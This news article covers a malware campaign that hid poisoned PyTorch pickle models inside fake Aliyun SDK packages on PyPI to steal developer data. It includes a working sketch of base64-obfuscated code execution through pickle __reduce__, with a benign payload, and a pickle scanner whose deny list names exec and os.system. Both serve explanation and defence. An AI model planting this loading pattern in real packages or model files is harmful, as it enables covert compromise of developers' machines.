
Poisoned models in fake Alibaba SDKs show challenges of securing AI supply chains

Malicious code in ML models is hard to detect. While Hugging Face hosts models directly, PyPI hosts Python software packages, so spotting poisoned models hidden inside Pickle files that are themselves buried inside packages could prove even harder for developers and PyPI’s maintainers, given the extra layer of obfuscation.

The attack campaign discovered by ReversingLabs involved three packages: aliyun-ai-labs-snippets-sdk, ai-labs-snippets-sdk, and aliyun-ai-labs-sdk. Together the three packages were downloaded 1,600 times, which is significant considering they were online for less than a day before being discovered and taken down.

Developers’ computers are valuable targets because they typically contain a variety of credentials, API tokens, and other access keys for cloud and local infrastructure services. Compromising such a machine can easily lead to lateral movement into other parts of the environment.

The malicious SDKs uploaded to PyPI loaded the malicious PyTorch models through the __init__.py script. The models then executed base64-obfuscated code designed to steal information about the logged-in user, the network address of the infected machine, the name of the organization the machine belonged to, and the contents of the .gitconfig file (the first code sketch below illustrates the loading mechanism).

There are signs in the malicious code that the main targets were developers located in China, which fits the lure of Aliyun SDKs: Chinese developers are more likely to use Alibaba’s AI services. However, the technique can be used against any developer, with any lure wrapped around a malicious model.

“This is a clever approach, since security tools are only starting to implement support for the detection of malicious functionality inside ML models,” the ReversingLabs researchers wrote. “Reporting security risks related to ML model file formats is also in its early stages. To put it simply, security tools are at a primitive level when it comes to malicious ML model detection. Legacy security tooling is currently lacking this required functionality.”
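To illustrate the loading mechanism ReversingLabs describes, here is a minimal, hedged sketch of how a Pickle-based model file can execute code the moment it is deserialized. Everything in it is a placeholder rather than the actual malware: the payload is a benign getpass call, and the file name model.pt is invented for the example. The same pattern applies to files loaded with torch.load(), which wraps pickle (newer PyTorch releases default to weights_only=True, which blocks it).

```python
import base64
import pickle

# Benign stand-in for the attacker's reconnaissance code; per ReversingLabs,
# the real payload collected the logged-in user, the machine's network
# address, the organization name, and the contents of .gitconfig.
SOURCE = base64.b64encode(b"import getpass; print('user:', getpass.getuser())")

class PoisonedModel:
    """Stands in for a tensor container inside a fake 'model' file."""
    def __reduce__(self):
        # pickle records this (callable, args) pair; unpickling later calls
        # exec(...) to "reconstruct" the object, running the decoded source.
        code = f"import base64; exec(base64.b64decode({SOURCE!r}))"
        return (exec, (code,))

# Attacker side: serialize the object into what looks like model weights.
with open("model.pt", "wb") as f:
    pickle.dump(PoisonedModel(), f)

# Victim side: merely loading the "model" runs the embedded code.
with open("model.pt", "rb") as f:
    pickle.load(f)
```

In the campaign, the equivalent load happened in the SDKs’ __init__.py, so a plain import of the package was enough to trigger the payload.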
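The quote above points at the detection gap: security tools barely inspect ML model formats. As a sketch of what such a check can look like, the snippet below walks a pickle stream’s opcodes with Python’s standard pickletools module and flags imports of callables commonly abused for code execution. The deny list and the STACK_GLOBAL handling are simplifying assumptions, not how any particular product works; real scanners also have to unpack ZIP-based PyTorch checkpoints and other container formats first.

```python
import pickletools

# Callables whose presence in a pickle stream warrants a closer look.
# Illustrative subset only; a real scanner needs a far larger deny list.
SUSPICIOUS = {
    ("builtins", "exec"), ("builtins", "eval"),
    ("os", "system"), ("posix", "system"), ("subprocess", "Popen"),
}

def scan_pickle(path: str) -> list[str]:
    findings = []
    strings = []  # string constants seen so far; STACK_GLOBAL consumes two
    with open(path, "rb") as f:
        for opcode, arg, _pos in pickletools.genops(f.read()):
            if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
                strings.append(arg)
            elif opcode.name == "GLOBAL":
                # Older protocols encode the import inline as "module name".
                module, _, name = arg.partition(" ")
                if (module, name) in SUSPICIOUS:
                    findings.append(f"{module}.{name}")
            elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
                # Protocol 4+ takes module and name from the stack; assume
                # they are the two most recently pushed string constants.
                if (strings[-2], strings[-1]) in SUSPICIOUS:
                    findings.append(f"{strings[-2]}.{strings[-1]}")
    return findings

print(scan_pickle("model.pt"))  # -> ['builtins.exec'] for the sketch above
```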

First seen on csoonline.com

Jump to article: www.csoonline.com/article/3998351/poisoned-models-hidden-in-fake-alibaba-sdks-show-challenges-of-securing-ai-supply-chains.html
